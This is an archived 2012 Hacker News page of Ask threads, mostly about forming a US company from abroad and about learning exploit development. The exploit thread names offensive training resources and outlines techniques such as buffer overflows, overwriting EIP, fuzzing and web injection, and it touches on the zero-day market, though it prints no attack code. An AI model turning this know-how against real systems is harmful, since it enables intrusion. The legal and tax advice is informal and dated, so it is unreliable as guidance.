hacker news with inline top comments    .. more ..    18 Jun 2012 Ask
home   ask   best   6 years ago   
1
Ask HN: Best iOS resource for non-iOS-developers?
4 points by sofuture  1 hour ago   2 comments top 2
1
OiNutter 1 hour ago 0 replies      
I learnt a lot from the Stanford online courses on ITunes U. Granted they are video lessons, but you can also grab all the lecture notes and sample code from this link:

http://www.stanford.edu/class/cs193p/cgi-bin/drupal/download...

Other than that I just googled the hell out of things, Stack Overflow was, as always, a valuable resource. Chances are that whatever you're trying to do, particularly when learning, somebody else has already done.

3
Ask HN: What is the point of 'likefarms'
2 points by Irishsteve  2 hours ago   1 comment top
1
Piskvorrr 2 hours ago 0 replies      
Amass some followers, then sell the likefarm (for a few cents per follower). The new owner will then replace the likefarm's content with their brand or whatever they wish - and it will look as if the brand has X hundreds of followers.

This practice is in violation of FB's ToS, and ethically questionable - but there's just enough money in it to make this worthwhile for the likefarmers.

4
Ask HN: How to setup a company in U.S. without being there?
172 points by ahmedaly  1 day ago   65 comments top 19
1
Maro 1 day ago  replies      
Disclaimer: I'm not a lawyer or accountant, and this is not legal or accounting advice.

I recently created a US company. Here's what I learned:

Most companies are set up in Delaware, because of Delaware's taxation and advanced corporate legal system. Setting up (and shutting down) a company in Delaware is very simple and streamlined, and most big US corporations are technically Delaware corps.

If there's a chance of raising US VC capital in the future, you will want to create a Delaware "C" Corporation, specifically. Many VCs will demand that you create a "C" Co. and transfer IP/business if you had another Co. previously. Ownership in a "C" Co. is based on shares, and the "C" Co. can later release and sell new shares to VCs: that's how investment deals happen in a nutshell.

To set up the company, we used a lawyer. After shopping around, $300/hr is what you should be prepared for, with about 10-20 hr to set up the "C" Co., another 10-20 if you want to transfer IP. Also, if your existing Co. is located in say Egypt, you'll need Egyptian legal council to cover your ass on that end (VCs will demand egyptian legal opinion for transfer of IP).

Once you have the company, you will need an EIN. That is simple and can be completed using a website for a Delaware Co. Then you need to open a bank account. In our case a US based partner did that at his local bank. There's an outfit called Bank of Silicon Valley who seem to be helpful in cases like yours and you can open an account with them, over the phone. Then you will need a virtual office and mail forwarding services, such services exist for Delaware Co's for a low yearly fee (~$50/mo), your lawyer will set you up. You'll also need a US accountant. Btw. your US lawyer will give you all this information. Overall you should expect to spend $10-20K on this.

In practice, the whole thing is pretty simple, and can be managed through email (scans for signatures), and US businesses are used to this. The whole thing can be completed in 1-2 weeks from the point of making initial contact with the US lawyer. Although lawyers have a bad reputation, I found that most lawyers are usually very professional and upfront about what they will charge and what the process will be, what to expect. If you need a contact try http://wsglegal.com is who we were recommended, used, and were very happy with. (I'm not affiliated).

So far so good, what sucks is the accounting / tax issues. That's where you will waste most of your time, esp. if you are based in Egypt. In our experiences, while lawyers are pretty professional about what they do, accountants are less so, and accounting/tax issues are the worst offenders for wasting valuable time. That's where you should be prepared for shit to hit the fan initially, esp. for international issues where neither side (US/Egypt) will have complete legal/accounting/tax knowledge. Your cheap plain vanilla local accountant will be useless.

Finally, you should know that the USA is a very litigious country, meaning people are more likely to sue you if they feel you owe them or you've wronged them. So once you have a US presence (a US Co.), customers and business partners, sooner of later shit _will hit the fan_ and you will probably get sued. It's the cost of doing business.

Overall, in my experience, if you don't want to raise US capital, I would suggest you do _not_ set up a US Corp. Staying local, and having to only deal with local legal/accounting/tax issues is _much_ simpler for you. Also, if your company is based in Egypt it's probably harder to sue you. I would invest major energies is trying to figure out how to take payments as an Egyptian entity, although admittedly I don't have much experience in this. You could also look into setting up a UK Co., I know people who did that to take payments.

The EverWrite guys have a nice writeup here:

http://everwrite.com/opening-a-delaware-corporation-an-incor...

2
ari_ 23 hours ago 0 replies      
Ahmed,
The issue is not setting up the company - what Maro describes below is a long and unnecessary way for most small companies to start up an american company. It can be done for 2 - 400 just to form the company. If you are seriously contemplating VC, then you need lawyer.
I would also agree with Maro about accountants :)

Anyway, the issue is that no merchant account will accept your US company, even if it has an EIN and a bank account, without a personal guarantee. And they won't accept a personal guarantee unless they can either:
1. Pull your US credit report (which you don't have)
2. Be assured you have some assets that are within reach of the US judicial system
or 3. take a huge rolling reserve off of your payments.

I would strongly suggest using 2CO, Paypal to get started. Too often we get involved in the paperwork and other stuff without proving the MVP.

Good luck from due east.

3
nirvana 23 hours ago 0 replies      
Incorporating in the USA varies by the state, and there are implications based on which state you incorporate in. For instance, some states have no corporate income tax, others due (Which is completely separate from federal taxes.) Various states have different amounts of regulation, licensing you might need (depending on your business) and different burdens of bureaucracy to deal with. Just something to be aware of. You'll need to at least file annual reports and pay a fee each year to keep the corporation going, though there may be other paperwork you have to keep up too.

The company corporation exists to provide most of the services you need. You can find them at www.incorporate.com They are good about reminding you of everything you need to file, and they also provide registered agent services. Every company needs to have someone in the state where they are incorporated who is there to receive process (e.g.: if someone sues you you have to have an agent who is identified publicly so you can get the court papers.)

They provide registered agent services and will facilitate incorporating in many of the states.

If you decide you need a mailbox in the USA, then there's earthclassmail.com which will offer you addresses in many states. I'm not sure what they require for non-american citizens to set up an account.

4
speleding 4 hours ago 0 replies      
If you just need a way to get paid then there are better ways than setting up a company. You could easily waste a lot of time there.

The way I branched out my company into unknown territories is to find a reseller there. Let them take care of the regulatory stuff. In this economy it should be easy enough to find someone who already has the company in place and needs some extra work on the side.

You can set up the contracts in such a way that you retain the option to buy them out and set up your own company at some point in the future.

6
mmaunder 17 hours ago 2 replies      
I did this before I became a citizen and before I had residency. Trust me: You only have one minor problem right now and it's not having a merchant account. Focus on solving that. Setting up a US corporation is a world of expense, complexity and hurt you don't need. The issue goes beyond the obvious, for example it's likely you'll be refused entry to the USA on a tourist visa if you're a shareholder and director of your own USA C corp. [No it's not documented anywhere so don't bother Googling]
7
neya 10 hours ago 0 replies      
Hi Ahmed, Here's my experience - I'm not a lawyer or anything, but I run one (an American LLC).

1) Ask yourself WHY you need a company in the US. It might not be worth it.

I registered one so that 1)it would be easier to accept payments from the US through their native gateways, because in my country, all of them suck.But if I had known the pitfalls first, I would rather have integrated with Paypal.

2)An American company's products are always perceived to be better than the rest.

I registered an LLC and every year, I'm required to pay an annual fee of $250 USD as Franchise tax. Mine is in Delaware so its just $250, if its in California, its going to be approx. $800 or so. $250 might not sound like a big deal, but for companies like mine, that are bootstrapping, it really is.

You are required to pay some more money as tax, apart from the Franchise tax on your ECI. ECI is effectively connected income - ie, The income generated by doing business with the US. This is going to get complex if you have an online internet business model.

You are required to have a registered agent to represent your company in Delaware. They charge anywhere from $50 to $200 a year.

The total tax you might end up paying for the same revenue stream is:

Franchise tax + tax for your ECI + registered agent fee + your local country's tax.

The situation gets even more complex when you hire more people.

Also, the organization's taxation methods change depending on the number of members (single/partnership/multi-member, etc.)

More on this:
http://www.irs.gov/businesses/small/article/0,,id=98277,00.h...

The worst part is, if someone decides to sue you, suddenly you are answerable to the American government, which you were not before. Your liability is also increased (unsure of this though).

Travelling to the US becomes a nightmare when you own an American company. Visa officers think you have a higher probability of settling there, rather than returning and it becomes increasingly difficult to get to the US, which I'm pretty sure is not what you want.

FYI:

I registered through a known friend, but the best place to get it done, if you ask me, is through Harvard business services (www.delawareinc.com). They have a lot of benefits (total cost to set up an LLC is under 600-700$ USD) and MANY of my friends have registered through them. They also are very transparent and their registered agent fee is only $50 a year! (I'm not their salesman though, for god's sake)

Anyway, If I had known these disadvantages first, I might as well have gone with a local organizational structure. Just keep these in mind while registering your new company... my 2 cents.

8
cmer 1 day ago 0 replies      
This article from my blog might help.
http://blog.carlmercier.com/2011/08/29/us-incorporation-for-...

It's more geared towards Canadians but I'm sure many things apply.

9
gte910h 11 hours ago 0 replies      
You'll be eaten alive by taxes if you're not careful, but yes, you can do it.

Law firms help do this. A few grand you can get someone like http://www.grellas.com/ do it 100% venture capital ready in Delaware.

If you're really just looking for a merchant account, make an LLC and get one in the name of that. Far cheaper, but will require the redo when/if you want investment.

Make sure you file the paperwork to do it's taxes like a C corp instead of a disregarded entity (Form 2553)http://www.irs.gov/pub/irs-pdf/f8832.pdf

10
yashchandra 22 hours ago 0 replies      
Since I own a small business (freelancer 1 man company), I can assure that if the idea is just to save money on international merchant account etc, the OP should do more research about cost and benefits. To setup any corporation in the US, there are multiple steps which also include cost. Do not go for the online ads that claim you can setup a company for $100. There are far more things like state filing etc. that are usually not included in those. Not to mention that you will be dealing with one of the most dreaded income tax collectors (a.k.a IRS in the US). I say this having lived in 3 different countries including the US.
If you absolutely need a foregin company outside Egypt, look into Asia (Hong Kong or Singapore preferably).
11
hackrocket 7 hours ago 0 replies      
Can anybody recommend a good US CPA and an accountant with experience in working with tech startups?

If you are looking for a lawyer I received good recommendations for:

- Ryan Roberts @ http://startuplawyer.com/contact

- Scott Edward Walker @ http://walkercorporatelaw.com/

- Grellas Shah LLP @ http://www.grellas.com/

12
Dystopian 1 day ago 1 reply      
If I was to look for creating an offshore corp I'd look at Hong Kong as opposed to Delaware, mostly for litigation reasons, to a lesser extent tax reasons. corps are pretty standard in both jurisdictions though. You'll be looking at around 10K-15K for setup and around 1K-2K a year in management / accounting fees. If you can find a lawyer / accountant in your jurisdiction that specializes in this they usually have preferred agents they work through to get you set up.
14
tszming 1 day ago 1 reply      
Is it really a good idea for a foreign startup to setup a US company just because of handling recurring payments for international customers, even including the factor of US tax?
15
alemhnan 1 day ago 0 replies      
I found that article here in HN some months ago: http://www.pluggd.in/incorporating-company-in-usa-from-outsi...

There are some useful info on that article. Nevertheless if someone has more info I would like to know different perspectives on that topic.

16
sathishmanohar 23 hours ago 3 replies      
Lets say, I incorporate as LLC, and decide down the road to take investment, can it be done? Can a LLC be changed to C-Corp, later?
17
pajju 1 day ago 0 replies      
18
startupsdesigns 1 day ago 0 replies      
You might be able to find answer to your question by contacting these guys. Hope it helps.

http://www.ready2inc.com/outsideUS.asp

19
melvinmt 1 day ago 1 reply      
It's not possible to open a bank account without being here in person (due to Patriot/Anti-Terrorism Acts). Other than that, there are many companies who can help you to get incorporated just by e-mailing papers back and forth.
5
Ask HN: Open source commenting systems for static pages - alternatives to Juvia?
4 points by przemoc  5 hours ago   1 comment top
1
sdoering 4 hours ago 0 replies      
Greetings from Germany,

as I am preparing the switch to a static site, I hope, there are interesting answers waiting out here.

Juvia is interesting, but - as you said - a bit overweight. ;-)

So I hope, that there do exist interesting alternatives, but till now, I didn't find any.

6
Ask HN: How do you learn to develop exploits?
155 points by bcattle  1 day ago   75 comments top 35
1
saurik 1 day ago 3 replies      
I would argue the magazines (such as 2600, which I absolutely loved when I was young) and books and oral tradition are all just ways of passing around specific and awesome anecdotes: it doesn't teach you how to do that, it is just interesting facts or entertainment for people who know.

What you need, instead, is a mindset: when you are at the supermarket checking out with one of those self-checkout machines, does some part of your brain start figuring out mistakes made in the mechanism that might allow someone to steal items?

If not, that is the kind of thought process that you need to get yourself to start doing: you need to keep asking yourself "if I were evil, could I do something evil here?", and you need to make it fun enough that you are doing it constantly.

With this mindset, finding exploits in software just becomes "teach me to program", as the kind of devious backchatter in your brain will just see things popping out "wait, what's to keep someone from cheating here and doing the opposite of what you say?".

The really epic hacks then just come from many years (the stereotypical 10,000 hours) of experience programming and trying things: it isn't because they read some magazine or learned from someone else. Instead, their midset just got better.

Think of it this way: it makes a lot of sense to ask "how do I learn how to use a violin", but "how do I learn musical taste" and "how do I learn to hear music in everything that surrounds me" are more awkward. The former is a skill, the latter two are mindsets.

2
dhx 1 day ago 0 replies      
The following comment will likely be deemed controversialâ€"but also critical to understanding how the open source community operates with respect to security issues.

Recognise that a lot of hype and circus has built up around around the field of ICT security. Linus made a very public and passionate argument in mid 2008 on the topic. Some sample quotes:

  So I personally consider security bugs to be just "normal bugs". I don't
cover them up, but I also don't have any reason what-so-ever to think it's
a good idea to track them and announce them as something special.
...
To me, security is important. But it's no less important than everything
*else* that is also important!

―Linus Torvalds[1]

Part of Linus' argument stems from the bazaar[2] model for developing software. A separate security ecosystem that works in secret and controls the distribution of source code is a throwback to the cathedral[2] model. Linux continues to be a success because it does not use the cathedral model.

Linux development occurs in the open amongst many selfish parties that sit anywhere on the scale between not caring at all about security to being paranoid about security at the exclusion of all other interests. In the middle of this disorder is someone like Linus who is trusted by the community to balance interests. On one side of the debate is PaX/grsecurity (or similar projects) lobbying for more controls and security features in the kernel. This party is generally happier to trade off factors such as performance and ease of kernel maintenance to gain additional security. The other side of the debate may be supercomputing users or embedded platforms who are not willing to trade off performance.

The security hype and circus around security-related bugs can be very dangerous to the ongoing health of open source software projects. I will use the personal example of Mantis Bug Trackerâ€"a project I have contributed to for the past few years. Many of the contributions I have made to the project are security relatedâ€"XSS, CSRF, access control, cryptography and more[3]. The CSRF protection in particular is a disgrace within Mantis Bug Trackerâ€"for reasons unrelated to security. A few years ago, some forms within MantisBT were protected by CSRF nonces. Obviously this is not a good situationâ€"every form which results in changes to state or data should be protected. I went through every form (grep -PRn "<form") and added nonces. Great! MantisBT was secure. But it was also very much broken. Numerous users started complaining about security error messages informing them of invalid tokens and the the incorrect possibility that they submitted a form twice. The cause? PHP session time-outs were invalidating CSRF nonces and not only prevented users from submitting lengthy bug reports and comments but also led to the loss of that user supplied information. The trade-off between security and usability was (and sadly, still is) broken.

When usability is broken to the detriment of security, the natural and completely understandable user decision may be to disable form CSRF security altogether or switch to another piece of bug tracking software that is less secureâ€"but also more usable. This is a security failure worth being concerned over.

The bazaar model calls for these issues to be thrown out in public on project mailing lists, bug trackers and source code repositories in the hope that a maximum number of eyes will look over the issue and feel a compulsion to assist with patches in the shortest period of time. Hopefully usability issues about any proposed patches are considered as part of this process, preventing the problem I mentioned above with CSRF nonce time-outs. The cathedral model on the other hand prefers to keep these issues secret amongst a select group of self-titled “experts” (core developers or otherwise). The chance of a quick resolution amongst this small group is smaller than if the issue was public with hundreds of eyes looking upon it. There is also a much greater chance that a small highly biased group will fail to correctly consider all the trade-offs.

In summary,

* Recognise that security is a trade-off against other factors and a balance needs to be struck. Bruce Schneier has been repeating this statement for over a decade on his blog. Linus has been proclaiming it on the Kernel mailing list. It is important.

* Know what the bazaar model of software development is, how it works and why the concept of secret walled-garden development communities in a much larger open source project can be considered offensive.

* Software developers have many “most important” problems to deal with at any time and are often volunteering their time. A bad, demanding attitude from a security researcher will not help.

* Security patches do not warrant a Millennium Prize any more-so than a patch to resolve a severe performance regression, data loss bug or major usability issue. Standing on top of a security pedestal in the sky is the antithesis to gaining respect from open source communities.

* Study the work of programmers who are well respected for their knowledge and experience with creating secure software. Some examples are Daniel J. Bernstein (djbdns amongst numerous other projects), Chris Evans (vsftpd), Timo Sirainen (Dovecot), Wietse Venema (Postfix) and Igor Sysoev (Nginx). If you want to make a contribution to ICT security there is no better way of doing it than creating your own secure-by-design software that is relied upon by billions of Internet users each day. The adversarial mindset is important but is not worth much without an ability to practically implement constructive changes.

[1] http://kerneltrap.org/Linux/Security_Bugs_and_Full_Disclosur...

[2] http://www.catb.org/~esr/writings/cathedral-bazaar/cathedral...

[3] Refer to oss-security@lists.openwall.com, mantisbt-dev@lists.sourceforge.net, http://www.mantisbt.org/bugs/search.php?project_id=0&cat...

3
Hrundi 1 day ago 0 replies      
You may have fun building fuzzers. You just feed all kinds of varied, random data to your app. If you only expect numbers, try and see how your app behaves if you feed it large or negative numbers, strings in certain charsets.

You'd be surprised to see the amount of apps that accept a single non-breaking space (alt + 0160) as an username.

Don't assume that a disabled, unchecked checkbox in a registration form can't be enabled/checked.
Don't expect that you'll receive a value from a <select> element that is actually contained within that dropdown's options.

When your app breaks horribly, your curiosity will hopefully throw you into a night of reading and hacking.

You can read more about fuzzing at Jesse Ruderman's blog[1]. He wrote very interesting fuzzers for Mozilla's JS, DOM and CSS parsers.

Sometimes, a friend of mine would ask me to check out his project. I proceed to act like an incredibly malicious user, then have this friend get mad at me.

It all clears out after explaining that he would always run into someone trying to break things. Even someone just trying to get a laugh!

[1] http://www.squarefree.com/categories/fuzzing/

4
crankyadmin 1 day ago 6 replies      
Read as much as you can about assembly. Debuggers are your best friend. Pick a target (app, iPhone, xbox, whatever). Attach debugger and step through the code and learn possible entry vectors (buffer overflow, loading for arbitrary file i.e. pdfs, so forth). Once you have an entry vector you essentially have an exploit, the rest is developing that exploit to do something "useful".

Sorry for the shortness of this response, if people are interested I can throw together a couple of blog posts.

5
rschmukler 1 day ago 1 reply      
"Smashing the stack for fun and profit" is absolutely a great introduction to the classic buffer overflow attack. It is also the foundation on which tons of exploits are built on: http://insecure.org/stf/smashstack.html

Once you've read that, I highly recommend going through Stanford's CS 155 practice assignment on the subject. Unfortunately I really can't find the assignment anymore but perhaps a more thorough search of their archives would reveal it.

However, here is a blog which details the answers to all of the problems and includes the problem themselves. It explains why they work, and how to get to them. Very helpful if you are interested in looking at more advanced techniques: http://blogs.hulmahan.com.ph/archives/category/hack-101

That takes care of the basic C sploits. Beyond that, it really depends which level you want to attack at. You can attack at the stack level for almost all programs.

For web applications, you can go at a much higher level with stuff like SQL Injection, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), and Session Hijacking.

Lastly, I highly recommend "Grey Hat Hacking, The Ethical Hacker's Handbook." This book does a fantastic job of giving you a taste of hacking at all levels. It covers OS attack possibilities, network level attacks, exploit generation and more. It also does a great job of introducing you to a lot of tools that help get the job done. From there, you'll at least be able to think of what you want to learn about next.

6
mmaunder 17 hours ago 0 replies      
Hanging out on boards, IRC, reading hacker publications will get you access to exploits of others. If you want to develop your own zero day exploits you need to become a really really great programmer. Then gain an understanding of the layers that live between the publicly accessible part of an application and the core system you want access to (usually the OS). Learn everything you can about those layers and how the creator has protected the system from unauthenticated users.

Sometimes you're dealing with completely open source apps. These are more secure but the plus side is that you have access to all uncompiled source code.

Sometimes you're dealing with all or part of the stack that is proprietary. These are sometimes less secure but you don't have access to easily readable source code so you need to use special tools to figure out what the creator has done to protect the system.

If you're trying to get into a specific system, intuition often helps you choose where to spend your energy first. You'll have a feel for what code has the least eyeballs on it or the less competent developers writing it, or less frequent updates so you look there first.

FYI there are two kinds of zero day exploits. The first is one you just discovered and no one knows about it. I think of that as true zero day. The second is one that fits the classical definition of the developer having zero dev days to fix it because they haven't been told yet, but many other folks may know about it. Discovering a true zero day security hole is very hard and getting harder because of the bounties being offered now. Often regular zero day holes are discovered by others who got hacked using it and simply back-tracked the hackers steps.

Hope that helps. I'm the developer of Wordfence, a security plugin for WordPress. Also disclosed the timthumb wordpress vulnerability last year and fixed the hole by rewriting timthumb.

7
danso 1 day ago 0 replies      
A lot of it is an understanding of human behavior, right? Especially one of other programmers. I once had to find a file that a company was compelled to publish but then replaced with a different version after a certain time period. The company said that this was legally fine but rather than argue about it, I just looked at the source code and saw that the href of the currently published file had "2" appended to it, as in, "list2.xml"

I knew from past experience that the company had hired someone to basically just make a separate site to host the damn file...in other words, the PR department had minimal knowledge/care about the technical details of the website.

And knowing how contract developers worked...that is, they know that if their client no longer sees a visible link to a file, than that file has been "deleted"...I just tried something like "list1.xml"...and voila

I know buffer overflow hacks are incredibly interesting but how many of the most significant hacks have been done through plain out guessing the target? I don't even mean social engineering...take, for example, the update_attributes hack on Github's rails setup. The vulnerability was well known and dismissed., so the hacker guessed how a project team might slip up and perpetuated an amazing and thankfully benign hack.

So I guess, a good start is to just be a decent programmer yourself, and to have understood why you follow the best practices

9
stiff 1 day ago 0 replies      
Maybe a fun way to get started would be taking an old version of a shitty server of some service and try to find possible ways of breaking it by examining the source code. There are really thousands of assumptions each computer program makes about the external world and security research seems to work by giving those assumptions an examination much closer than the original programmers gave.

In the end I don't think there is too much to say about "exploit development" per se, it's all about identifying those assumptions that could be fruitfully abused, once you find a way, writing the exploit should be the easy part. So, I would take some amateur ftp server, or maybe something famous for its insecurity (I know wuftpd used to have a bad rep) and then basically try writing a FTP client that tries to break some restriction the server or protocol intended to keep. From there, you just have to learn to identify more assumptions, by studying programming languages, operating systems, network protocols etc., whatever might be helpful (and it always amazes me what kinds of crazy details people in security can take advantage of). Another aspect is exploring the assumptions of software you don't have the source code of, so basically reverse engineering.

I am more of an admirer of security work than a practitioner, so maybe other people can elaborate some more, but I hope this is a valuable starting point.

10
ihodes 1 day ago 1 reply      
tptacek (of Matasano) has a list of books on Amazon he has suggested for learning just that: http://www.amazon.com/lm/R2EN4JTQOCHNBA
11
iuguy 1 day ago 0 replies      
Vivek Ramachandran's Exploit Research Megaprimer[1] is a good video series for the basics. Peter van Eeckhoutte's article series[2] also provide a good hands on for getting started. Vivek's doing a training course at 44Con (disclaimer: I'm one of the organisers) that covers some of this[3] and looks quite promising but if London's a bit of a stretch you should be able to find training courses at conferences closer to home.

The Shellcoder's handbook is a good starting point too but is getting a bit long in the tooth. Attacking the core is a good starter on kernel bug dev. Both should be available on Amazon.

It's also worth pointing out that if you have a local Def Con chapter it's worth going at least once or twice to see whether or not you like it. Same if there's a local BSides event - these are free events, wildly variable in quality but run by the community for the community. There's also other cons like 44Con, Brucon, Cansec, Defcon etc. if you really want to get into it but these can be quite expensive.

I'm not sure where you're based, but if you're in or near London the local Def Con chapter DC4420[4] is on tuesday downstairs at the Phoenix, Cavendish square near Oxford Circus. I'll be there and will be more than happy to have a chat with you and introduce you to people.

[1] - http://www.securitytube.net/groups?operation=view&groupI...

[2] - http://www.corelan.be/index.php/articles/

[3] - http://44con.com/training/vivek-ramachandran-hacking-with-py...

[4] - http://dc4420.org/

12
raverbashing 1 day ago 0 replies      
Here's my suggestion

You create a toy exploitable program, and you start exploiting that

But before that, brush up on C and assembly (the basics of assembly at least). x86 is "easier" (more human readable I'd say but lots of quirks if you want to write, but easier than x86 in 16bit) but if you want to study exploits in other platforms they have some quirks.

That's "exploits 101" lets's say. That will cover the most basic tools you'll need and trying that is a great exercise

See the links other posted for "smashing the stack for fun and profit"

After that, you could try old programs and studying known exploits for specific versions (say program X has a certain exploit that works like that, so you could try making an exploit for that)

13
trotsky 1 day ago 1 reply      
The way most folks learn to do high end niche programming: In advanced degree programs, research organizations and through professional development at government employers / contractors.

Charlie Miller is a well known example of this - he famously markets himself as a reliable exploit writer, his background came from doing the same work at the NSA.

In most cases it's a very technically challenging effort, beyond what most people will self teach. Simply finding the bug is often the easy part as compared to reliable exploitation.

The best publicly accessible sources of learning are security conference papers and university theses, though they don't usually explain the basic techniques or high level techniques. "Underground" sources like 2600 for the most part publish rather poor or incomplete material, though they occasionally do have some top notch stuff.

I assume this is related to the old Andy Greenberg article that's on HN right now. While I wouldn't say those prices are an outright fabrication, it is definitely misleading. It is very rare for those kind of prices to get paid, at least reliably. It's much more common for prices to be in the four or low five figures ranges when sold and often go completely unsold. It has a lot to do with who the buyer is and what their budgets are like and how well known you are and on and on - not totally unlike a traditional governmental procurement process.

What that article really was was an advertisement for that broker - the price list was there because he's trying to say hey you're getting screwed come to me! I would guess that the reality of working with him is significantly more middle class.

14
ElliotH 1 day ago 2 replies      
http://exploit-exercises.com/ has a good virtual machine that you can exploit in your own time. I enjoyed working through Nebula.
15
dguido 1 day ago 0 replies      
I would say the master->apprentice relationship is quite common.

I'm surprised that no one mentioned my class yet, where I have some of the best people in the world talk about exactly how to learn this stuff.

http://pentest.cryptocity.net

http://pentest.cryptocity.net/careers

16
SoftwareMaven 1 day ago 1 reply      
I've got http://exploit-exercises.com/ bookmarked, but haven't had a chance to start the exercises yet.
17
attheodo 1 day ago 1 reply      
Ideally you have to master a low level language like C, socket programming and assembly on various architectures. You can somehow get away with a scripting language like perl or python and drop-in shellcodes but I suggest you do it the hard way.

You can start reading the classics (although most of them not applicable today) like Smashing the Stack for fun and profit by Aleph One, 7350 (teso security group) papers on format-string exploitations as well as various other techniques on heap-over flow techniques, double free()'s etc. A very good book for all round exploitation with some advanced techniques is "The Shellcoders Handbook" which I highly recommend. The Phrack magazine (before the editing team changed) has some really juicy techniques on exploiting various platforms.

Other than that, you should browse through A LOT of source code trying to identify bugs in open source software and subscribe to various security bulletins so you can read advisories and try to exploit them. GDB is your best friend for that job since analyzing core files is the beginning of everything.

Finally you should get involved in security communities (the more under the ground they are, the better) and attend security cons (HAL, Defcon, CCC).

I used to do some heavy exploit writing back in high-school and I can tell you it's really REALLY fun but time-consuming and frustrating sometimes. Exploiting software is a form of puzzle solving.

18
makmanalp 1 day ago 0 replies      
For in depth technical work, try doing "crackme" puzzles. Google for them and you'll find some. Also, take a look at fravia's pages (I wonder if he's still alive?)

Edit: http://www.woodmann.com/fravia/

19
jiggy2011 1 day ago 0 replies      
Depends on what you are trying to exploit I imagine, there are a huge number of different techniques out there.

Have a look at http://www.securityfocus.com/archive/1

and if you can get some sample exploit code and study it.

Then perhaps study some of your own programs with a more devious mindset and figure out what you have forgotten to take into account.

20
arihant 1 day ago 1 reply      
Get very good with the instruction set. Get very good at gdb. Then learn about memory management and networking protocols. Look up networking libraries in C.

To start, I'd say have a good C manual (K&R), have a good book for computer systems (Computer Systems by Randy Bryant, but there are other good ones) and a good documentation on gdb. gdb is where it begins.

21
adrusi 1 day ago 0 replies      
This question reminds me of when people in my school ask me "where did you learn all this computer stuff?"

You can't make a list of resources that will get you to your goal, you can make one that will give you the foundational knowledge you need to start, but after that you just need to live in the right mindset and start doing it.

I'm not and exploit developer, but I'd imagine that the following would be useful practice:

1) Find a famous exploit, and read about what it accomplished but not how it was done. Then attempt to redo it. When you get stuck, look at what the original exploit did and continue from there.
2) Do the above on a heavily exploited technology, but only read about a few of the exploits. While attempting to exploit in one way, keep your eye out for other holes that you can exploit and develop an exploit that you hadn't even heard of before. It's probably already been done, but you came up with it independently.
3) Now try the same on something less exploited, but still with at least one exploit that you can follow along with. Try to develop a completely original exploit in this way.
4) Now find something unexploited and dig around for an exploit. Now you have enough practice that you should have the ability to identify a potential exploit when confronted with it.

Of course, you should repeat each of the above steps at least a few times before moving on to the next.

22
jdefr89 1 day ago 0 replies      
If you wan't to learn to develop exploits I would read some of these few sources to get started...

1. The Shellcoder's Handbook
2. Hacking: The Art of Exploitation
3. Gray Hat Hacking
4. w00w00 Exploiting Heaps

Basically memory exploits all boil down to overwriting the EIP with an address that points to some code that does something.

Of course there are all sorts of exploits, some simply send bad data to crash the server as a Proof of concept.. others are more sophisticated, either way if you can program all you need to do is learn a few methods and then writing the exploit shouldn't be so bad..

23
bluesmoon 1 day ago 0 replies      
There's a lot of good advice here. I'll limit this post to how I learnt. I'd never really read any articles before starting out on my own. For me it was mainly curiosity. I was writing code with a bunch of guys at school, and one of the guys wanted to protect his data (on a shared data store), so he implemented his own encryption scheme. I didn't know anything about encryption, but had access to his source code, so studied his algorithm and managed to build a decoder.

After that I started studying my own programs to see if there were any obvious patterns that someone else could guess. This was before the days of CGI on the web.

My curiosity continued when CGI was growing and I learnt first how to fool a guest counter, and then how to build a more secure one. I started learning peel and read all the man pages. There was a lot of stuff in there that was like "don't do this because it's insecure". To that end I owe a lot to Larry, Randall, and Tom.

What I learnt from there helped me protect myself against XSS attacks, but also taught me what to look for without needing the source. It wa a while before I heard about CSRF attacks. At this point I was interested enough to see what OWASP listed as the top exploits and did some studies on each of them.

At no point have I ever used what I know for malicious purposes.

24
Mvandenbergh 1 day ago 0 replies      
I see a few other people have already recommended resources for learning about vulnerability discovery, which is mainly about fuzzers these days.
A good resource for determining how to exploit that vulnerability so that it does neat things for you is The Shellcoder's Handbook (some asm required, but not too hard if you know some OS internals).
25
erikb 1 day ago 0 replies      
I'd agree with most what saurik said. Mindset is one of the most important things about anything. It's always not about WHAT you do, but about HOW you do it. A person who really learns is someone, who views himself while he does something and repeats it later on to discover what he did, how he did it and what else he could've done.

But that's not the reason, why I'm writing here. Since I started to get better at anything I'm doing, I realised that it's always about the little things. If you see someone do one thing that is small, great and everybody loves it, then what actually happened was that this person did millions of small steps that where stupid before. You just didn't see it. Millions, it's not a joke! And of all these things, a lot of them are about just learning boring things. If you want to become a cracker (I'm morally neutral, so I don't really care WHAT you want to become), then you should start out with learning to code and to learn to code quite well. Then you should learn all about how the internet works. That means learning to code more, and then to also learn all about the network protocols and layers and also about how the hardware is wired. Learning all this will automatically show you the limits of what security can achieve (for example you will understand naturally that there can't be a perfect code. Every code must contain the information it tries to hide, some where. So every code will be broken some day.) and also where people did mistakes. And if you have the right mindset you will find ways to hack systems, that actually don't even involve to circumvent security systems.

To make a long story short: You need both, mindest and a lot of knowledge.

26
philfreo 1 day ago 0 replies      
The easiest way to learn how to exploit is to learn how to prevent exploits in your own code. There are usually lots of tutorials/articles from that point of view. Some easy examples: once you've learned what SQL injection or XSS is and how to prevent it, it becomes easy (almost a habit) to look to see if other apps have done the same.
27
deyan 1 day ago 0 replies      
Fravia's portal on reverse engineering used to be a great starting point. Starting with Assembly and (old) Phrack articles as others have suggested is a great idea as well.
28
krenoten 1 day ago 0 replies      
Two things: understanding and manipulating.

1. Understand what a program is. How the architecture of your computer allows it to run programs. How to look into the guts of a program - currently running or while dormant - and figure out how it processes any and all input you are able to feed it. What mechanisms are in place to prevent exploits.

2. Study bug classes and exploitation techniques. Information leaks are often important to remotely exploit code protected by ASLR. Build fuzzers. Use a tool like the absolutely incredible Vivisect recently released by visi at SummerCon a few days ago to see whether it is possible to get to a vulnerable code segment from the entry points you are able to find. Craft input to reach the identified bug, and leverage it to achieve arbitrary code execution. Never forget that while your focus may be zoomed in on a handful of opcodes that there is in fact an entire system environment in place and potentially at your disposal.

It's a daunting amount of information. Many of the best have been taught via something reminiscent of oral tradition, and like anything you wish to achieve mastery of you will learn faster with feedback from those with more experience. Most public hacker forums are about downloading tools for SQLi and have nothing to do with exploit development at all. But make some friends who are good at it and seek their feedback.

I guess start off by reading the corelan exploit tutorials, which go pretty deep pretty fast and may be a good start for somebody with programming experience. Simultaneously work through the reversing tutorial by lena on tuts4u. I think that may be a good start.

29
wslh 1 day ago 0 replies      
Look at "Insecure Programming by example": http://community.coresecurity.com/~gera/InsecureProgramming/
30
uki 1 day ago 0 replies      
